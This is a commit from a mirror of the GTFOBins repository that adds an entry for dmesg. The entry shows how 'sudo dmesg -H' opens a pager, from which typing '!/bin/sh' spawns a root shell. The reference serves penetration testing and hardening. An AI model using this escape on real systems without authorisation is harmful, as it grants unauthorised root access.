1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Add dmesg

Close #32.
This commit is contained in:
Andrea Cardaci 2018-11-12 15:10:13 +01:00
parent 23dae5406e
commit 3cbfa05169

9
_gtfobins/dmesg.md Normal file
View File

@ -0,0 +1,9 @@
---
description: |
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
sudo:
- code: |
sudo dmesg -H
!/bin/sh
---